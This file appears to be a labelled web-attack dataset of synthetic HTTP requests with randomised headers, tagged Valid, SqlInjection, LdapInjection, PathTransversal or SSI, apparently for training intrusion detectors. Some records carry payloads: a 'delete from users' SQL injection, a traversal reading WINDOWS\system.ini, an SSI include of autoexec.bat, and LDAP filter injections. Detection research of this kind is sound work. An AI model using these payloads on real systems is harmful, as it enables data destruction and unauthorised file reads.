If-Modified-Since: Fri, 26 Nov 04 05:22:24 UTC
If-Unmodified-Since: Sun, 01 Jun 08 10:04:30 UTC
If-Match: "mr0@yFj@yTxee.yu"
If-None-Match: "tMEJkVSg2OrljzrS9s"
If-Range: Sat, 14 Nov 09 07:27:13 CET
Max-Forwards: 8622
MIME-Version: 5.1
Proxy-Authorization: NTLM ZWkyemh1bHB6d2kwZnJhY3NldHdvYXNlZDdpaEFlc2FpcjRwVG9Bb3RnbmVvZmU=
Authorization: edst ntDr0=tnuswr
Referer: http://www.ulfE.uk/hceneec/wa4ri6/Tletye/u5ysqmN.css
TE: gzip,deflate
Trailer: Accept-Encoding
User-Agent: dOn1amunhnh7re
UA-CPU: MIPS
UA-Color: color32
Via: 8.6 67.217.108.123:2354, 4iss/5.7 88.207.194.95
Transfer-Encoding: tgrhi
----: ----------------------------------------

4satdhintseie=iszs6r&t6uqnoeat8f=pZMhZx&catCtne=eudui2rttCrdul&OzDXiHy9VL=yUe8T&u00execa-xL1xeM=ebfEakewciuaC8orsy&TFf-7=2496501&szpi0aomuea=60&e0drpw=c&oSrqmr=eDk_yn&towdeyreutrmd=80&aoipoiHsap=104012&aid=052717&o7n=mdl6ve3aac

End - Id: 46441
Start - Id: 40545
class: SSI
GET /nVS.tftpHjLQ.php?symthe3Eoeve=%3C%21--+++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E HTTP/1.0
Host: www.nhzcza.be
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: big5, iso-8859-9, ks_c_5601-1987, x-mac-hebrew
Accept-Encoding: 
Accept-Language: tDM9au-ee;q=0.5, 9r2niaue-rsirAtnn;q=0.0
Cache-Control: only-if-cached
Client-ip: 32.122.234.119
Cookie: gert=wqhMlEY;yK.E6g=335699044;osheatYP=eH0H
Cookie2: $Version="2"
Date: Sun, 28 Jan 07 06:26:53 GMT
ETag: W/"D8T7@zVFaVB37s."
Expect: 100-continue
From: ta3nehq@tidsguy.fr
If-Modified-Since: Sat, 01 Aug 09 07:29:43 GMT
If-Unmodified-Since: Sat, 17 Sep 05 24:15:17 UTC
If-Match: "McF55ICqnB8orqMD"
If-None-Match: *
If-Range: Thu, 24 Apr 08 17:29:27 CET
Max-Forwards: 0420
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: eyuU tZee=sndi
Authorization: Basic b3FMMmVhbjp0Y2E3ZWVsbQ==
Range: 7-
Referer: http://blle.gov/teRtai.gif
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.5 (Machintosh; U; PPC Mac OS X 5.2; iu-as; rv:9.7.5) Gecko/48562641
UA-CPU: MIPS
UA-Disp: 5247,6150,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0457x8183
Via: HTTP/3.7 14.21.121.160
Transfer-Encoding: gzip
Upgrade: enoi6/9.0, nmeG/6.4, qlt/3.9
Warning: 564 www.dt5nmh.gif "yhcyTbTnls0" 
X-Forwarded-For: 172.8.17.63
X-Serial-Number: 9009184147
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40545
Start - Id: 45367
class: PathTransversal
PUT /nlT.b0SPMUjRIlGR6VVd/j@e_3ZmV2p/n2R27f4.sY5rv/e0P29OJL/iXB@BgF/OY/ahrfix9iBOQ.jpg? HTTP/1.1
Content-Length: 122
Content-Language: meidc,iTtxitac,de
Content-Encoding: deflate
Content-Location: http://wttl.org/mgebecI/wAene/Dalnt/ear9.php4
Content-MD5: dEdoamVua1I5dnYweXNpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Sep 09 06:28:25 CET
Last-Modified: Wed, 07 May 08 15:41:40 CET
Host: 97.254.155.100:80
Connection: keep-alive
Accept: video/mpeg;q=0.0, application/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=6
Client-ip: 45.42.189.117
Cookie: seNgsuctstazet= 2 ;e9z=scriptsyav znf;cois=62593119;replaceccJlikeY=2107424111;lt=cQNElKBKr;ZyY8ya8GzRi=9
Cookie2: $Version="0"
Date: Tue, 19 Jan 10 20:00:46 UTC
ETag: W/"B9SBjm1lLCiZpvnPjtU"
Expect: 100-continue
From: meaol@shaU.gov
If-Modified-Since: Fri, 21 Apr 06 15:07:50 CET
If-Unmodified-Since: Tue, 20 Jul 04 05:38:07 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 15 Feb 06 13:51:42 UTC
Max-Forwards: 33
MIME-Version: 9.2
Pragma: nir=y3reici
Proxy-Authorization: Basic c2V1cnRtcjpkZTF1
Authorization: otor7 orgso=hnot1E
Range: 74377-10,-135
Referer: http://www.TNeeo8.net/1ne2ice/gsuuclim/8eb6eeL4.swf
TE: trailers,gzip;q=0.4
Trailer: Referer
User-Agent: Mozilla/5.6 (Machintosh; U; PPC 1.6; te-ha; rv:7.3.9) Gecko/73741153
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Pixels: 0455x0884
Via: HTTP/8.7 182.24.46.159, enei/5.9 www.ctynna74.gif
Transfer-Encoding: compress
Warning: 033 102.101.187.47 "senpv3nMsOiNryeagcPt" 
X-Forwarded-For: 42.158.87.228
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5xVgX=\Nha&tctrddrm=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini&shd=yOxxiX5y&eyAnJehtvbtk=65302215

End - Id: 45367
Start - Id: 42100
class: SqlInjection
GET /lak@ebtIA3WE/tp6u.bin?wHazetlotoote=%27+%29%3B+delete++from++users%3B++commit%3B+++++dummy%28++++%27 HTTP/1.0
Host: www.wadweihn.it
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: yaec-ddmmo7a;q=0.3, mlhzmnH-g3tch;q=0.6, ushe-s6brRyOr;q=0.9, ecsBiz-e;q=0.9, csnonmsE-aa8csc
Cache-Control: no-store
Client-ip: 195.244.99.47
Cookie: 6h=3fJpB@0TZj;ic4j=u;1eIloews9h7eW=0567353;eR8to=sock_stream
Cookie2: $Version="787"
Date: Sat, 18 Jul 09 16:27:35 GMT
ETag: W/"D83eFbifPOT4iL7"
Expect: troiSdth=erstetro;ir9otau
From: LzmxnseS@evezd.fr
If-Modified-Since: Thu, 09 Nov 06 21:49:12 UTC
If-Unmodified-Since: Fri, 02 Nov 07 22:48:49 CET
If-Match: "DzdzsRX5efM3eheoOl"
If-None-Match: *
If-Range: Sun, 25 Oct 09 10:38:31 UTC
Max-Forwards: 50
MIME-Version: 0.9
Pragma: dlm6accr='oxnauah'
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: Digest opaque="rot0ett"
Range: -824,-58,-460
Referer: http://t3hcqrn.uk/oaI07.tiff
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.1 (Windows; U; WinNT 7.9; ro-dw; rv:3.4.0) Gecko/36742022
UA-CPU: Sparc
UA-Disp: 7402,9004,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4728x9077
Via: 7.2 21.154.160.191, 1.4 www.su0ortlt.htm:7
Transfer-Encoding: deflate
Upgrade: axh/8.9, sit/8.6, rcc/1.0, ite/1.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42100
Start - Id: 38992
class: LdapInjection
GET /s5gXstSH.js?U0td=%29++%28+++%7C++%28cn%3D*o++++%27brien*+%29%28mail++++%3D*o++%27brien*+%29+++&upoiahio=eYqb%40VKnJ7&ee=feunwussxnes HTTP/1.1
Host: www.erN4.net
Connection: 6irmr
Accept: text/*;q=0.2
Accept-Charset: x-mac-roman;q=0.9
Accept-Encoding: 
Accept-Language: ahft9T5-c, i76teuwe-t, d-oogadl;q=0.2, riY-ninms7e;q=0.4, hgwtg-8h;q=0.8
Cache-Control: no-cache
Client-ip: 136.161.80.255
Cookie: nslr=sewt;OEe1Ka6NjyoY=r9sh-e1e';ikctrg8o=18224;deEHoacnsEeioas=25853
Cookie2: $Version="51"
Date: Tue, 17 Aug 04 16:38:20 CET
ETag: "9iXp@tJghwelCND"
Expect: 100-continue
From: xuahq@twsoetroa.com
If-Modified-Since: Fri, 02 Apr 04 17:43:34 CET
If-Unmodified-Since: Tue, 07 Mar 06 19:54:27 GMT
If-Match: "OVFBg2OB0sVJ6FLD7te"
If-None-Match: *
If-Range: "mswrVjepbj3FJ48Gp9O"
Max-Forwards: 2
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: NTLM cmM2RmFwZTF4cGt0c3NFQU9xaVdydGh6T2VhU292cXM=
Range: 2-,-247703
Referer: http://www.ennrtnse.org/pntsa.conf
TE: trailers
Trailer: Range
User-Agent: Mozilla/7.7 (Windows; U; Windows NT 4.2; 33-us; rv:8.9.9) Gecko/96627190
UA-CPU: MIPS
UA-OS: Windows NT
UA-Pixels: 8193x847
Via: HTTP/6.7 176.17.248.123, 9.3 www.vbhw.jpeg, 4.4 www.dnsR3he.js
Transfer-Encoding: compress
Upgrade: ir0/8.9, deh7/6.4
Warning: 690 www.hd6EutI.tiff "hneytet" 
X-Serial-Number: 95673
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38992
Start - Id: 36978
class: LdapInjection
GET /pJsgafto3teoeClinzz/tc8jT0heectatnnlurDo/rthjrbdvwlhox2Fchge/AZ2JV/upuriie/iDIpUkEEKf/arrlcnuppisoturgEo/th1o76Pyzz/CuconnectlHAd/eVKTaaOyAeBy4aw/yLts_.dQJuLisg.php3?coetzgf=19&2AQRACvv=3937723260&b0PRjAhFJNN=lPb-yuKKDGhq&ejfkau=37&I3og=Cposition&AACrmHS=4193&dq@S5logl=aGo%7Cew%3Ayzy%2F%40ahnh&rjsEssl7iq=76219&somsievlediee=%29+++%28%7C+%28np%3Dm4ao*%29&rdtoepxantea=+rrcUsamed HTTP/1.0
Host: www.Ah3e.st:77970
Connection: Alhs1t7
Accept: image/png;q=0.4
Accept-Charset: koi8;q=0.3, iso-8859-1;q=0.2, ks_c_5601-1987, x-mac-roman
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=09
Client-ip: 41.167.121.88
Cookie: cjssweebmAeenmi=6;rsxtmsn4vct=swWYT;AnIrci=e@relo7 dte8ee;rEeaos=ssret%ni<Emhttpandusrformh o
Cookie2: $Version="2"
Date: Wed, 07 Feb 07 05:44:29 UTC
ETag: W/"YZcyTj4_d3_1LAB"
Expect: 100-continue
From: 4t9lsozn@n1ns8ofqic.ch
If-Modified-Since: Fri, 31 Oct 08 15:35:55 CET
If-Unmodified-Since: Fri, 18 Aug 06 02:46:42 CET
If-Match: *
If-None-Match: "pc-oEkXLVe-JP1W"
If-Range: "tIEpV54KJtfgbVYqooZ"
Max-Forwards: 0907
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: dakr8 nhu1=fhnr
Authorization: Digest algorithm=lHno4y97
Range: 84-,-422477,1197-5319
Referer: /suo5Tabe/zbAsdosi.exe
TE: trailers
Trailer: Max-Forwards
User-Agent: mohl (tJqIYv1h)
UA-CPU: StrongARM
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 654x7541
Via: FTP/0.7 193.235.139.46
Transfer-Encoding: 6eo02
Upgrade: eslm/4.5, njAt/8.0
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Serial-Number: 4593021783716355
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36978
Start - Id: 27521
class: Valid
GET /uiwimeesj3b7ntyrab3r/i0P5bV/1Hjatajebl/oscripthttp8bTZ/htpass9ecK1dXE/ua8e/oM-AwxquZCyHoCvFk/ani0SQinput-4.jpg?rcTtxe=86&wIHVZH0wY0=6966357&vy1iPWNMHu=7&YW.R2mailktps_b=ngbUqeb&atnzidedhhnnnb=DsttlneSpOel&ucim=ii&uS6iiHHatoh=aoftp%26 HTTP/1.1
Host: www.anEe7.be
Connection: keep-alive
Accept: */*
Accept-Charset: windows-874, iso-8859-15, x-mac-greek;q=0.5, euc-tw;q=0.6
Accept-Encoding: *
Accept-Language: jse-cTnnoASa
Cache-Control: max-stale
Client-ip: 34.117.164.116
Cookie: tinsrehoagmreor=x(oroa;ku6almr5tqtzm=envnexec r;drop@t3db=32;Letgwe1dmfl3sae=2675;see=3hd5Nidrafacat;qidnInU09=a4vDB6ONb
Cookie2: $Version="1"
Date: Fri, 02 Apr 10 04:46:55 CET
ETag: "p7VzHMhO8c9vL12v9qK"
Expect: me45h5b
From: Ifxyn@cystcefu.uk
If-Modified-Since: Wed, 30 Jun 04 06:50:49 UTC
If-Unmodified-Since: Mon, 02 Jun 08 24:39:24 UTC
If-Match: "Xid2zeqVhT8xnbo7"
If-None-Match: *
If-Range: Thu, 31 Dec 09 14:37:58 UTC
Max-Forwards: 7
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest qop=CeGosd
Authorization: Digest opaque="lter7X"
Range: 895579-,54531-,8-
Referer: http://www.ienc.uk/ensooiz/ieosbp/ohbmu/TwcmC/gsi8.zip
TE: chunked;q=0.0,gzip,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 2.7; da-ae; rv:6.8.8) Gecko/09505339
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5041x3321
Via: HTTP/1.9 www.ebfi.gif, 4.1 173.60.9.56
Transfer-Encoding: deflate
Upgrade: ieiie/4.6, kord/5.1, Nat/2.2
Warning: 561 www.Nlensr.png "s0qusp6lni" 
X-Forwarded-For: 102.128.80.116
X-Serial-Number: 713179267523
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27521
Start - Id: 9620
class: Valid
GET /4ehIt8A-fDBES0xFt.0.msf?dogse5lks=7827&tGc3iseh=xljfa&BxBBz=eHZ8&BDTfBk=4&lnph-OWkR=sahtbhebpl HTTP/1.1
Host: 167.21.80.34
Connection: i7heeght
Accept: application/*
Accept-Charset: x-mac-icelandic, iso-8859-8, cp-932;q=0.0, big5;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=77
Client-ip: 192.221.57.112
Cookie: 6aaoyu1jljA=-tbonsamebz\;otAinte=p2ylGQV8VZ;oyeEhegteftknss=e6InRxLT;replaceNaSmaillw0T=13;edCmi=tesle;2sdZxM-_=andi|
Cookie2: $Version="43"
Date: Mon, 31 Aug 09 03:35:17 GMT
ETag: W/"K4@O.cegRPvtQa-Yp"
Expect: 100-continue
From: yiJqeaa@9hauhsGph.fr
If-Modified-Since: Fri, 14 Mar 08 07:19:34 GMT
If-Unmodified-Since: Fri, 03 Dec 04 01:45:24 GMT
If-Match: *
If-None-Match: "MSRxGVzn738hJ0gwQL3E"
If-Range: *
Max-Forwards: 9
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM cHd6c0Nycm90dHVoZWxsaGVobmZ0U3RlN2R4cDF6cmRkZXNrZ29zdDg=
Authorization: Digest nc=A0E8816f
Range: -72733
Referer: http://9Hthi.cz/osruron/upoA/rhAna.png
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: jyltUEko
UA-CPU: Sparc
UA-Disp: 8659,744,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7520x0183
Via: 8.3 146.135.186.86, olron/5.1 www.esU8r.shtml
Transfer-Encoding: h3lu; hfgn=Celinys
Upgrade: tevh/9.7, aoerh/2.1, y3ie/0.6, SsG/4.7, wde/6.4
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 34.115.88.196
X-Serial-Number: 04486
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9620
Start - Id: 2602
class: Valid
GET /lKcD6fCx/i8B@/7g@l2o17/iqmvHlh2@BB05aa/hoetkd3setAngrawoeRr/uoddNtpmTfs5sZ2/0Vh@AGnz/esenedxebtmtp/2t/n3LnKN_sA1mGowd/tmmwelanHl8hqit4.asmx?oulg=n6rq4ubfW&ihvamluHf2=62436541&inannnvenos=vwccinputyt4tgncom&tnteeahus=neUe&truat=981&is=leS HTTP/1.0
Host: 98.204.132.143:6163
Connection: close
Accept: audio/basic, image/gif, video/mpeg;q=0.4
Accept-Charset: windows-1251;q=0.7, x-mac-arabic;q=0.5
Accept-Encoding: 
Accept-Language: one2rh-nne, tnOe-imtOdnd, Olee3fb-i;q=0.4, onOitsie-n
Cache-Control: max-age=71855
Client-ip: 176.65.14.94
Cookie: tRfOtkm3pn=2099907344;5OEr=sa;8.hKwjKKwgN5=3tdr;aN8ruttw=mUvIJy;c74=75734067
Cookie2: $Version="09"
Date: Thu, 24 Dec 09 02:25:32 GMT
ETag: W/"Odn1fMbYERnDz3JfNZL"
Expect: naNene=2hsh
From: ctew@aidI.be
If-Modified-Since: Mon, 17 Apr 06 23:39:37 GMT
If-Unmodified-Since: Sat, 18 Oct 08 11:55:20 GMT
If-Match: *
If-None-Match: *
If-Range: "31DK_Ef5u7-M2R5O4"
Max-Forwards: 029
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: slEt dtcveeSm=keeh
Range: 358055-4261
Referer: http://1yakrl.ch/uept/rt8r/oftewrh/jSha6.fgf
TE: trailers,trailers,gzip
Trailer: If-Modified-Since
User-Agent: fRSvRR http://www.ZdboeBn.ch
UA-CPU: PowerPC
UA-Disp: 5183,3355,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6037x127
Via: 7.1 217.53.113.177
Transfer-Encoding: identity
Upgrade: hutie/7.1
Warning: 139 202.175.202.238:09 "if85tEa" "Sun, 03 Sep 06 18:25:51 GMT"
X-Forwarded-For: 111.117.154.17
X-Serial-Number: 9671188655936
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2602
Start - Id: 2820
class: Valid
GET /eKzr-qN.MLLP/sh1ahobject/vvtefuxxeofktIh/Ju@ftp-K_WJL3/aa76T1Pnbs/jbl8LtaX/fuFr3aY/nlsyEhhaetktydbc.tiff?bsb6senecyrgp=313856&eilhss=tih5e+oM+sm8yinj%3Dse%3F&op=uS%40&es4ia=iptni9zw&aIce=99&Ethssef4azr4=530101157&i2insertP8allR3=70762160&ti4uameh=wrzmO.fh&iteyaOvo4lves=jsp143NS HTTP/1.1
Host: www.ktOhS9e.cz
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=5
Client-ip: 91.229.231.50
Cookie: gmf=hd;dWM8BOS=7801
Cookie2: $Version="0"
Date: Tue, 26 May 09 19:03:23 GMT
ETag: W/"JGJZWirbyxB4m9y"
Expect: Nxkt
From: gntRe@hm8riOnnau.uk
If-Modified-Since: Thu, 11 May 06 04:36:39 CET
If-Unmodified-Since: Wed, 05 Apr 06 19:24:49 UTC
If-Match: "YyB4AbekzXPbxWwU19XR"
If-None-Match: *
If-Range: Sun, 16 Jul 06 04:43:45 GMT
Max-Forwards: 32
MIME-Version: 8.2
Pragma: 1='acr'
Proxy-Authorization: Basic b3J4dDp0NWozaFBz
Authorization: NTLM bzM4bmgzVGh0bHlhaXJhZHRlc2U1YzNlRGxiOWFhOGlpdHFhY2Vj
Range: 1-2
Referer: http://ebpBmd5.uk/Mjiwhi6w/wolEydnn/w0ef0os.php4
TE: gzip,trailers,deflate
Trailer: If-Range
User-Agent: Mozilla/2.1 (Windows; U; Win98 3.4; sd-ds; rv:9.2.4) Gecko/83873949
UA-CPU: Sparc
UA-Disp: 462,5180,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 620x373
Via: 6.6 192.92.16.249, 0.2 www.ruurcpt.png:93, 7.7 193.70.170.142
Transfer-Encoding: identity
Upgrade: Sbhjos/1.1
Warning: 710 163.232.225.18 "glcasie34ee" 
X-Forwarded-For: 213.3.252.110
X-Serial-Number: 82627
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2820
Start - Id: 9155
class: Valid
GET /tz0yZ@/rdBkhVqpMD0w/3Q9FsrA/hr_zsazgbiNX1Uw/mioen/yerNieRbu5w9qvryeio6/mihTrirTsea/jtcangYswrL/tOMhREEL-l/ht1mTbRfXqpO.0Yha/wtu1e.pl?entu0mwvaaje=3195111449&raeEq8RO9ovuanA=vwq9R29Nafzq&seksist=s8ey6iuN0tahdi&adtcvlpodtdtrs=4430&evgia=2396046538&erdsntie7IeYo=mimg%7ErlservicesadmindTahtnh&S6YlocationCv=aMG&nOpdFp=%29yt&vAdylItoyoew6=hrcftehltlifto&cNl2c=%29&e5exarti2Nrcs=g-8olwindow.open&itshhaa=358&hahnmrtni6he=25274697&nXDZBvd=pe&e6s30A=odncanrOnoeaieuj HTTP/1.0
Host: www.oHsenh8nSw.ch:80
Connection: keep-alive
Accept: video/*, image/*;q=0.0
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.9, compress
Accept-Language: *;q=0.0
Cache-Control: u9='m3d'
Client-ip: 67.89.1.105
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="583"
Date: Thu, 31 May 07 11:43:28 UTC
ETag: "jZ5op7eCvaTJUPG1EHJ"
Expect: Tialu
From: fwtTde@tnn0ld58.biz
If-Modified-Since: Mon, 09 Nov 09 02:05:05 GMT
If-Unmodified-Since: Sat, 16 Dec 06 22:39:13 UTC
If-Match: *
If-None-Match: *
If-Range: "ye3cNLKIiwnHHIsysh"
Max-Forwards: 767
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM c3VmZE5kbmpsMXNhRXlFMW90ZWZpb29ob2V5ZWplcm9pYWxubHJpeHN1
Authorization: NTLM aHBydHRyZHVlZ2UybzdoZXVhb2FvYnY2c3EzZkdkYWJpeG9udnV1Z2lvOWVldWE=
Range: -7586
Referer: /fee89a.js
TE: trailers
Trailer: Date
User-Agent: acynkatmn (tkxiN@; cZDchE)
UA-CPU: MIPS
UA-Disp: 104,519,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0794x264
Via: 3.4 206.42.57.152:2, FTP/4.4 www.tvpti.gif
Transfer-Encoding: gzip
Upgrade: mapEt/8.1, RNae/5.1
Warning: 159 www.0AEorhcn.jpeg "6asniYhhhgonscr" "Sun, 16 Apr 06 01:50:22 CET"
X-Forwarded-For: 189.85.16.83
X-Serial-Number: 3795859892
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9155
Start - Id: 11894
class: Valid
GET /JbB/P3nehrcsisilmro.asmx?aees=4&d9=838&i5n=im-&nhanensd=2298 HTTP/1.1
Host: 3.195.72.34
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 8.113.175.85
Cookie: vxe=06570;aojIDMcvF9=ndafetancolmsdd;-70Ggbody3eVd=071834850;I0uR1le4=54
Cookie2: $Version="53"
Date: Fri, 24 Mar 06 11:57:22 GMT
ETag: W/"Xeo@EaWGnDsJT@6"
Expect: 100-continue
From: weec@otvo.uk
If-Modified-Since: Wed, 11 Oct 06 06:53:23 UTC
If-Unmodified-Since: Thu, 31 Jul 08 04:41:06 GMT
If-Match: *
If-None-Match: "Gi2K7MQmVcMP66YBo_m"
If-Range: "cGb5T7wbkQT6fLN"
Max-Forwards: 50
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest username="lSa3"
Range: 477-56
Referer: http://www.nlx8o.fr/sHWnh/onuuaeaa/toseal.asp
TE: chunked
Trailer: If-None-Match
User-Agent: Mozilla/7.0 (X11; U; Linux i386 5.1; es-Hh; rv:7.0.4) Gecko/22238997
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 151x6583
Via: 6.0 www.isN9kuh.tiff, 3.9 www.eqdpUpr.png
Transfer-Encoding: compress
Upgrade: Ijh/8.0
Warning: 032 www.ca9a6wh.png "rnn53ecqdgOmY0eteI" 
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11894
Start - Id: 2342
class: Valid
GET /sntcboeaopesnP/tItqOOpMy-siKRI7/67Voh/hbvR/eNTDVA6tdO9@fV0Fj/7etc/aixa3zngnc/tcqqDsrtrs0enn/0UI1EOmnsU.shtml?opteeasstf=69499860&ppkSrc=hiE&a4rehan=106718859&S7rbtfootAn=lto%3An&Tdseenuatg3u7v=2020&yt=r-jPCQe&bhdo=88808676&QMMechoJH=8 HTTP/1.0
Host: www.redlo2.com
Connection: keep-alive
Accept: text/*, text/*, audio/*
Accept-Charset: utf-7;q=0.6, koi8-r;q=0.0, macintosh;q=0.3, x-mac-chinesetrad, windows-1253
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 99.64.17.15
Cookie: nhMnip=73;orfeSloA=y;5fhv9lhtixe=otaxuij;8VRnCeHOu=4692316;lcvatsah4zeae=tidirTsn
Cookie2: $Version="0"
Date: Thu, 29 Jan 09 04:16:11 GMT
ETag: "JM_Y.OAAIRRMv7jf2x1k"
Expect: eei2r
From: lrstrhg@6Sezstv6ct.uk
If-Modified-Since: Sun, 30 Dec 07 17:08:15 UTC
If-Unmodified-Since: Mon, 30 Aug 04 11:43:14 GMT
If-Match: "ykwQJk3ibMwXzz0Sp"
If-None-Match: "DK3yjXwx1Npqatd"
If-Range: *
Max-Forwards: 6
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest response="32CC03ccCD2C4F02bb800C8DE1CCEbDB"
Authorization: Digest uri=/etseHt.css
Range: -6000,-150
Referer: /ifatra/rUncmat/re5amne/iueoNdty/rhaa.htm
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: tsyoum0aveRpoOir
UA-CPU: PowerPC
UA-Disp: 581,250,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1640x452
Via: 0.1 16.208.232.220, FTP/1.7 13.55.140.169:11674
Transfer-Encoding: compress
Upgrade: 74si/9.9, ixt/2.4, jarRcm/9.9, eiC/2.5
Warning: 789 www.UIAEbi.html "nl3eweeSsue" 
X-Forwarded-For: 120.175.57.26
X-Serial-Number: 7123081582615631
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2342
Start - Id: 3126
class: Valid
GET /ezp8FzSWSGoP6qd/tmp5w/Adivm/mseimdsil4ehoje/yTAs1sZrIBitl2N/ebsazeaaihsbthR/spAuQ.thCj08C/G4KdBp0lfh.htm?hetagusmeaeay=nki71oee&scriptvstdinRuP3b=020097166&atss=eorvTZlu19ogtrG&dafartfsiS=rdtuo&AnrrfuimY=76778717&ey5Te3c1yrm7s=o2&5eAorsaset=tyha+&B3rZ2z@7Azr=dryooti HTTP/1.0
Host: www.ahf7os3.uk
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: vdis-nMota, 4blt-binubaee, seyyel-v;q=0.4, oe-Iugnnm, ssNee-fhnjeU;q=0.2
Cache-Control: 9retiggl=at
Client-ip: 53.213.84.202
Cookie: 7Oninotiniartce=fPZSaK;okin=2580214510;xgrrJH=tltehslAwlit8eiaT;Yi=3x|e-e4zusrsirnEusnRts;7_ET=of~y5'adminlst
Cookie2: $Version="133"
Date: Sat, 17 Jun 06 16:44:38 CET
ETag: W/"k1bDH-QRD6giy00AGJ0"
Expect: aahb=foha;meRl7
From: eead@01e8oq1.gov
If-Modified-Since: Fri, 02 Feb 07 12:25:02 UTC
If-Unmodified-Since: Thu, 29 May 08 02:28:36 CET
If-Match: "rdT3btif2dxfJ2ImA"
If-None-Match: *
If-Range: Sat, 27 Feb 10 22:14:06 UTC
Max-Forwards: 99
MIME-Version: 8.6
Pragma: n='da'
Proxy-Authorization: Basic OGlhbnVyb2U6ZGZqb2VyZWE=
Authorization: Basic ZWNub3lSY2U6YW1ydHNhbmc=
Range: -6106,0309-,1-
Referer: http://eawo8.org/l3tn/ejh5iok/hnarAyka.php4
TE: deflate;q=0.4,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/6.0 (Windows; U; Win 9x 5.9; om-is; rv:1.2.8) Gecko/78559618
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5219x775
Via: 0.3 167.38.94.5, 4.1 www.c2uf.shtml:1349, 7.9 66.7.97.89
Transfer-Encoding: veo9
Upgrade: s2let/3.4, e5ew0u/6.3
Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 54.64.220.207
X-Serial-Number: 1722875
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3126
Start - Id: 33459
class: Valid
